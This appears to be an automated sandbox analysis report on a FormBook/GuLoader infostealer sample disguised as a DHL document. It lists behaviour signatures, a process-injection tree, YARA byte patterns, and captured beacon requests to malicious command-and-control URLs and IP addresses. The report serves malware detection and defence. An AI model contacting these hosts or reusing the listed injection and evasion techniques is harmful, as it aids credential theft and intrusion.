
Windows Analysis Report
DHLIN00178.exe

Overview

General Information

Sample Name: DHLIN00178.exe
Analysis ID: 829130
MD5: 66fdf2df4fc8601124df76c284f797e1
SHA1: 88031f2f9bfbf3eb0b069c68fd4ed4ee288daf9f
SHA256: e07a149d14fc37367e7331342d07dc45aec9ef7bbce780ea636c5d04f6c26f3f

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • DHLIN00178.exe (PID: 3876 cmdline: C:\Users\user\Desktop\DHLIN00178.exe MD5: 66FDF2DF4FC8601124DF76C284F797E1)
    • DHLIN00178.exe (PID: 1776 cmdline: C:\Users\user\Desktop\DHLIN00178.exe MD5: 66FDF2DF4FC8601124DF76C284F797E1)
      • explorer.exe (PID: 4760 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • cscript.exe (PID: 1912 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
          • firefox.exe (PID: 5256 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
            • WerFault.exe (PID: 2884 cmdline: C:\Windows\system32\WerFault.exe -u -p 5256 -s 284 MD5: 5C06542FED8EE68994D43938E7326D75)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
    Source | Rule | Description | Author | Strings
    00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f0c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        No Sigma rule has matched
        No Snort rule has matched


        AV Detection

        Source: DHLIN00178.exe | Virustotal: Detection: 12%
        Source: Yara match | File source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: http://www.sem-jobs.com/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.37123.vip/i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY | Avira URL Cloud: Label: malware
        Source: http://www.popcors.com/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.hhkk143.cfd/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.popcors.com/i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== | Avira URL Cloud: Label: malware
        Source: http://www.casinoenligne-france.info/i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== | Avira URL Cloud: Label: malware
        Source: http://www.hot6s.com/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.sandyhillsagritourism.com/i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== | Avira URL Cloud: Label: malware
        Source: http://www.spotcheck.site/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.adasoft.info/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.37123.vip/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.hhkk143.cfd/i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY | Avira URL Cloud: Label: malware
        Source: http://www.adasoft.info/i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== | Avira URL Cloud: Label: malware
        Source: http://www.dinggubd.net/i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== | Avira URL Cloud: Label: malware
        Source: http://www.dinggubd.net/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.sem-jobs.com/i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY | Avira URL Cloud: Label: malware
        Source: http://www.casinoenligne-france.info/i9th/ | Avira URL Cloud: Label: malware
        Source: http://www.spotcheck.site/i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY | Avira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY | Avira URL Cloud: Label: malware
        Source: 7.2.explorer.exe.14163814.0.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: 9.2.firefox.exe.1e1f3814.0.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: 8.2.cscript.exe.4f33814.3.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: DHLIN00178.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: DHLIN00178.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: cscript.pdbUGP source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
        Source: Binary string: mshtml.pdbUGP source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cscript.pdb source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\DHLIN00178.exe | Code function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exe | Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exe | Code function: 1_2_00402765 FindFirstFileA,
        Source: C:\Windows\SysWOW64\cscript.exe | Code function: 8_2_00613200 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\DHLIN00178.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi

        Networking

        Source: C:\Windows\explorer.exe | Network Connect: 104.21.8.203 80
        Source: C:\Windows\explorer.exe | Network Connect: 156.255.170.114 80
        Source: C:\Windows\explorer.exe | Network Connect: 222.122.213.231 80
        Source: C:\Windows\explorer.exe | Network Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exe | Network Connect: 64.190.63.111 80
        Source: C:\Windows\explorer.exe | Network Connect: 3.9.182.46 80
        Source: C:\Windows\explorer.exe | Network Connect: 199.192.30.193 80
        Source: C:\Windows\explorer.exe | Network Connect: 38.163.2.19 80
        Source: C:\Windows\explorer.exe | Network Connect: 185.53.177.54 80
        Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.3 80
        Source: C:\Windows\explorer.exe | Network Connect: 154.210.212.94 80
        Source: C:\Windows\explorer.exe | Network Connect: 103.20.61.209 80
        Source: C:\Windows\explorer.exe | Network Connect: 85.13.156.177 80
        Source: C:\Windows\explorer.exe | Network Connect: 164.88.122.250 80
        Source: C:\Windows\explorer.exe | Network Connect: 81.88.48.71 80
        Source: C:\Windows\explorer.exe | Network Connect: 173.230.227.171 80
        Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll, type: DROPPED
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1 | Host: www.sandyhillsagritourism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1 | Host: www.sem-jobs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1 | Host: www.casinoenligne-france.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY HTTP/1.1 | Host: www.37123.vip | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1 | Host: www.adasoft.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY HTTP/1.1 | Host: www.hhkk143.cfd | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1 | Host: www.popcors.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY HTTP/1.1 | Host: www.spotcheck.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1 | Host: www.dinggubd.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&WsTjx=NuByY HTTP/1.1 | Host: www.hot6s.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1 | Host: www.0w3jy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY HTTP/1.1 | Host: www.cmproutdoors.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1 | Host: www.daon3999.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY HTTP/1.1 | Host: www.5319ss.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1 | Host: www.riverflow.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY HTTP/1.1 | Host: www.verde-amar.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1 | Host: www.sandyhillsagritourism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1 | Host: www.sem-jobs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: Joe Sandbox View | IP Address: 156.255.170.114 156.255.170.114
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:36 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:39 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
